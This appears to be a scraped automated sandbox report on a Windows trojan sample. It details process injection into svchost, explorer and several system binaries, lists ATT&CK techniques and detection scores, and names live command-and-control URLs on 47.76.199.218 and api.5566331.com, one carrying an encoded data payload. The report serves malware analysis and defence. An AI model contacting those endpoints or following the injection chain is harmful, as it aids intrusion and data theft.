                      Source: C:\Users\user\Desktop\1731043030539.exeCode function: GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,wsprintfW,lstrlenW,OpenProcess,CloseHandle,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,OpenProcess,InitializeProcThreadAttributeList,GlobalAlloc,InitializeProcThreadAttributeList,UpdateProcThreadAttribute,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,DeleteProcThreadAttributeList,GlobalFree,CloseHandle,wsprintfW,wsprintfW,OpenProcess,CloseHandle,OpenProcess,CloseHandle,wsprintfW,wsprintfW,OpenProcess,OpenProcess,CloseHandle,wsprintfW,wsprintfW,PathFindFileNameW,InitializeProcThreadAttributeList,GlobalAlloc,InitializeProcThreadAttributeList,UpdateProcThreadAttribute,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,DeleteProcThreadAttributeList,GlobalFree,CloseHandle,wsprintfW,wsprintfW,OpenProcess,CloseHandle,wsprintfW, C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p0_2_00007FF6E53411CB
                      Source: C:\Users\user\Desktop\1731043030539.exeCode function: lstrcmpiW,OpenProcess,IsWow64Process,CloseHandle,lstrcmpW, svchost.exe0_2_00007FF6E5341BD1
                      Source: C:\Users\user\Desktop\1731043030539.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetwork -pJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SysWOW64\fontview.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\resmon.exe C:\Windows\SysWOW64\resmon.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\BackgroundTransferHost.exe C:\Windows\SysWOW64\BackgroundTransferHost.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exeJump to behavior
                      Source: explorer.exe, 00000002.00000002.3300221466.0000000009BE4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096750303.0000000009BE3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
                      Source: explorer.exe, 00000002.00000000.2036661129.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3294728668.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                      Source: explorer.exe, 00000002.00000002.3297182237.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2036661129.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3294728668.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000002.00000000.2036661129.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3294728668.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000002.00000000.2036661129.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3294728668.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000002.00000000.2035928494.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3292960857.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
                      Source: C:\Users\user\Desktop\1731043030539.exeCode function: 0_2_00007FF6E5341ED6 cpuid 0_2_00007FF6E5341ED6
                      Source: C:\Windows\SysWOW64\control.exeCode function: EnumSystemLocalesW,3_2_1003B37D
                      Source: C:\Windows\SysWOW64\control.exeCode function: GetLocaleInfoW,3_2_1003B3BA
                      Source: C:\Windows\SysWOW64\control.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,GetLocaleInfoW,3_2_1004A78D
                      Source: C:\Windows\SysWOW64\control.exeCode function: GetLocaleInfoW,3_2_1004A94F
                      Source: C:\Windows\SysWOW64\control.exeCode function: EnumSystemLocalesW,3_2_1004A9FD
                      Source: C:\Windows\SysWOW64\control.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_1004AA3D
                      Source: C:\Windows\SysWOW64\control.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_1004AABA
                      Source: C:\Windows\SysWOW64\control.exeCode function: GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,3_2_1004AB3D
                      Source: C:\Windows\SysWOW64\control.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,3_2_10037B53
                      Source: C:\Windows\SysWOW64\control.exeCode function: GetLocaleInfoW,3_2_1004AD30
                      Source: C:\Windows\SysWOW64\control.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_10047D86
                      Source: C:\Windows\SysWOW64\control.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_1004AE58
                      Source: C:\Windows\SysWOW64\control.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_1004AF05
                      Source: C:\Windows\SysWOW64\control.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,3_2_1003CF4D
                      Source: C:\Windows\SysWOW64\control.exeCode function: _TranslateName,_TranslateName,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,3_2_1004AF6D
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: EnumSystemLocalesW,6_2_1003B37D
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: GetLocaleInfoW,6_2_1003B3BA
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,GetLocaleInfoW,6_2_1004A78D
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: GetLocaleInfoW,6_2_1004A94F
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: EnumSystemLocalesW,6_2_1004A9FD
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,6_2_1004AA3D
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,6_2_1004AABA
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,6_2_1004AB3D
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,6_2_10037B53
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: GetLocaleInfoW,6_2_1004AD30
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_10047D86
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_1004AE58
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: GetLocaleInfoW,_GetPrimaryLen,6_2_1004AF05
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,6_2_1003CF4D
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: _TranslateName,_TranslateName,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,6_2_1004AF6D
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: EnumSystemLocalesW,8_2_1003B37D
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: GetLocaleInfoW,8_2_1003B3BA
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,GetLocaleInfoW,8_2_1004A78D
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: GetLocaleInfoW,8_2_1004A94F
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: EnumSystemLocalesW,8_2_1004A9FD
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,8_2_1004AA3D
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,8_2_1004AABA
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,8_2_1004AB3D
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,8_2_10037B53
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: GetLocaleInfoW,8_2_1004AD30
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,8_2_10047D86
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_1004AE58
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: GetLocaleInfoW,_GetPrimaryLen,8_2_1004AF05
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,8_2_1003CF4D
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: _TranslateName,_TranslateName,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,8_2_1004AF6D
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: EnumSystemLocalesW,9_2_1003B37D
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: GetLocaleInfoW,9_2_1003B3BA
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,GetLocaleInfoW,9_2_1004A78D
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: GetLocaleInfoW,9_2_1004A94F
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: EnumSystemLocalesW,9_2_1004A9FD
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,9_2_1004AA3D
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,9_2_1004AABA
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,9_2_1004AB3D
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,9_2_10037B53
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: GetLocaleInfoW,9_2_1004AD30
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,9_2_10047D86
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_1004AE58
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: GetLocaleInfoW,_GetPrimaryLen,9_2_1004AF05
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,9_2_1003CF4D
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: _TranslateName,_TranslateName,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,9_2_1004AF6D
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: EnumSystemLocalesW,10_2_1003B37D
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: GetLocaleInfoW,10_2_1003B3BA
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,GetLocaleInfoW,10_2_1004A78D
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: GetLocaleInfoW,10_2_1004A94F
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: EnumSystemLocalesW,10_2_1004A9FD
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,10_2_1004AA3D
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,10_2_1004AABA
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,10_2_1004AB3D
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: GetLocaleInfoW,10_2_1004AD30
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,10_2_10047D86
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: GetModuleFileNameW,___crtMessageBoxW,GetStdHandle,_strlen,WriteFile,__invoke_watson,___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,10_2_1003CD92
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_1004AE58
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: GetLocaleInfoW,_GetPrimaryLen,10_2_1004AF05
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: _memset,_TranslateName,_TranslateName,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,10_2_1004AF6D
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_0000000180007D50 GetSystemTimeAsFileTime,1_2_0000000180007D50
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_1001D6D7 socket,WSAGetLastError,htons,htons,htonl,htons,setsockopt,setsockopt,setsockopt,setsockopt,bind,recvfrom,WSAGetLastError,inet_ntoa,sendto,3_2_1001D6D7
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_1001DFCB socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,bind,WSAGetLastError,setsockopt,setsockopt,3_2_1001DFCB
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_10026330 bind,InterlockedIncrement,InterlockedIncrement,3_2_10026330
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_10022490 socket,ioctlsocket,bind,SetLastError,listen,WSAGetLastError,GetLastError,SetLastError,WSAGetLastError,SetLastError,WSAGetLastError,SetLastError,3_2_10022490
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_1001D91A socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,setsockopt,bind,recvfrom,WSAGetLastError,inet_ntoa,sendto,3_2_1001D91A
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_1001D6D7 socket,WSAGetLastError,htons,htons,htonl,htons,setsockopt,setsockopt,setsockopt,setsockopt,bind,recvfrom,WSAGetLastError,inet_ntoa,sendto,6_2_1001D6D7
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_1001DFCB socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,bind,WSAGetLastError,setsockopt,setsockopt,6_2_1001DFCB
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_10026330 bind,InterlockedIncrement,InterlockedIncrement,6_2_10026330
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_10022490 socket,ioctlsocket,bind,SetLastError,listen,WSAGetLastError,GetLastError,SetLastError,WSAGetLastError,SetLastError,WSAGetLastError,SetLastError,6_2_10022490
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_1001D91A socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,setsockopt,bind,recvfrom,WSAGetLastError,inet_ntoa,sendto,6_2_1001D91A
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_1001D6D7 socket,WSAGetLastError,htons,htons,htonl,htons,setsockopt,setsockopt,setsockopt,setsockopt,bind,recvfrom,WSAGetLastError,inet_ntoa,sendto,8_2_1001D6D7
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_1001DFCB socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,bind,WSAGetLastError,setsockopt,setsockopt,8_2_1001DFCB
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_10026330 bind,InterlockedIncrement,InterlockedIncrement,8_2_10026330
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_10022490 socket,ioctlsocket,bind,SetLastError,listen,WSAGetLastError,GetLastError,SetLastError,WSAGetLastError,SetLastError,WSAGetLastError,SetLastError,8_2_10022490
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_1001D91A socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,setsockopt,bind,recvfrom,WSAGetLastError,inet_ntoa,sendto,8_2_1001D91A
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_1001D6D7 socket,WSAGetLastError,htons,htons,htonl,htons,setsockopt,setsockopt,setsockopt,setsockopt,bind,recvfrom,WSAGetLastError,inet_ntoa,sendto,9_2_1001D6D7
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_1001DFCB socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,bind,WSAGetLastError,setsockopt,setsockopt,9_2_1001DFCB
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_10026330 bind,InterlockedIncrement,InterlockedIncrement,9_2_10026330
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_10022490 socket,ioctlsocket,bind,SetLastError,listen,WSAGetLastError,GetLastError,SetLastError,WSAGetLastError,SetLastError,WSAGetLastError,SetLastError,9_2_10022490
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_1001D91A socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,setsockopt,bind,recvfrom,WSAGetLastError,inet_ntoa,sendto,9_2_1001D91A
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_10026330 bind,InterlockedIncrement,InterlockedIncrement,10_2_10026330
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_10022490 socket,ioctlsocket,bind,SetLastError,listen,WSAGetLastError,GetLastError,SetLastError,WSAGetLastError,SetLastError,WSAGetLastError,SetLastError,10_2_10022490
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_1001D6D7 socket,WSAGetLastError,htons,htons,htonl,htons,setsockopt,setsockopt,setsockopt,setsockopt,bind,_memset,_memset,recvfrom,WSAGetLastError,inet_ntoa,sendto,10_2_1001D6D7
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_1001D91A socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,setsockopt,bind,_memset,_memset,recvfrom,WSAGetLastError,inet_ntoa,sendto,10_2_1001D91A
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_1001DFCB socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,bind,WSAGetLastError,setsockopt,setsockopt,10_2_1001DFCB
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Valid Accounts
                      14
                      Native API
                      1
                      Valid Accounts
                      1
                      Valid Accounts
                      1
                      Valid Accounts
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading
                      11
                      Access Token Manipulation
                      11
                      Virtualization/Sandbox Evasion
                      LSASS Memory231
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable Media2
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1022
                      Process Injection
                      11
                      Access Token Manipulation
                      Security Account Manager11
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      DLL Side-Loading
                      1022
                      Process Injection
                      NTDS3
                      Process Discovery
                      Distributed Component Object ModelInput Capture2
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      Application Window Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                      Obfuscated Files or Information
                      Cached Domain Credentials1
                      System Network Configuration Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading
                      DCSync2
                      File and Directory Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      File Deletion
                      Proc Filesystem22
                      System Information Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583249 Sample: 1731043030539.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 100 28 api.5566331.com 2->28 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus / Scanner detection for submitted sample 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 3 other signatures 2->44 8 1731043030539.exe 1 2->8         started        signatures3 process4 signatures5 46 Changes memory attributes in foreign processes to executable or writable 8->46 48 Contains functionality to inject threads in other processes 8->48 50 Injects code into the Windows Explorer (explorer.exe) 8->50 52 7 other signatures 8->52 11 svchost.exe 8->11         started        14 explorer.exe 72 7 8->14 injected process6 signatures7 54 Contains functionality to inject threads in other processes 11->54 56 Writes to foreign memory regions 11->56 58 Injects a PE file into a foreign processes 11->58 16 control.exe 11->16         started        20 fontview.exe 11->20         started        22 resmon.exe 11->22         started        24 2 other processes 11->24 60 Deletes itself after installation 14->60 process8 dnsIp9 26 api.5566331.com 47.76.199.218, 49705, 49706, 49707 VODAFONE-TRANSIT-ASVodafoneNZLtdNZ United States 16->26 30 Found evasive API chain (may stop execution after checking mutex) 16->30 32 Found stalling execution ending in API Sleep call 16->32 34 Found API chain indicative of debugger detection 16->34 36 Contains functionality to detect sleep reduction / modifications 20->36 signatures10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      1731043030539.exe61%VirustotalBrowse
                      1731043030539.exe66%ReversingLabsWin64.Trojan.ReflectiveLoader
                      1731043030539.exe100%AviraTR/Crypt.EPACK.Gen2
                      1731043030539.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=17358065900%Avira URL Cloudsafe
                      http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=173580%Avira URL Cloudsafe
                      http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=17358065630%Avira URL Cloudsafe
                      http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=17358066180%Avira URL Cloudsafe
                      http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=0%Avira URL Cloudsafe
                      http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=17358065350%Avira URL Cloudsafe
                      http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=173580%Avira URL Cloudsafe
                      http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=17358065050%Avira URL Cloudsafe
                      http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=x3N9tEE0lQUf*i9u1AJBLZ3udzrGo7J9wzUQnwqEojuqL4*8d5TpYqNaLoElKA2eLt5tJwUso0CT4hx7*brOujTPxt86i1LQoCN1bWPfh0c6TblwURKXa*YTrdRDdpFzPPjdf6A5hqF6agS5bMFml2tycvxuF8UFeAKptoU6nA1cgx5I7zk50dryFihgpyA0PukB3pWbqvv1m9czQ98TexEeBUkYnPWhl9iP5lmz2GhU0unSn1dv0GeLH-OgLe5CX54v7Yi7WikjFNlbGcralrQa62waJH3pu9aTS352sJXA9uT9hy8ZcQrnfm*BM8ui63qGw1hOYc0Maww2aCZlGFx2c*WqEiD7rdNNLo2gqW-R05XE8J-33FyFPn7LMN6KEOJbTRxuzcnsrcYfCcxUhimBcpclNQDyBgNCuTCZtw4=0%Avira URL Cloudsafe
                      http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806607&data=0%Avira URL Cloudsafe
                      http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=0%Avira URL Cloudsafe
                      http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=173580%Avira URL Cloudsafe
                      http://47.76.199.2180%Avira URL Cloudsafe
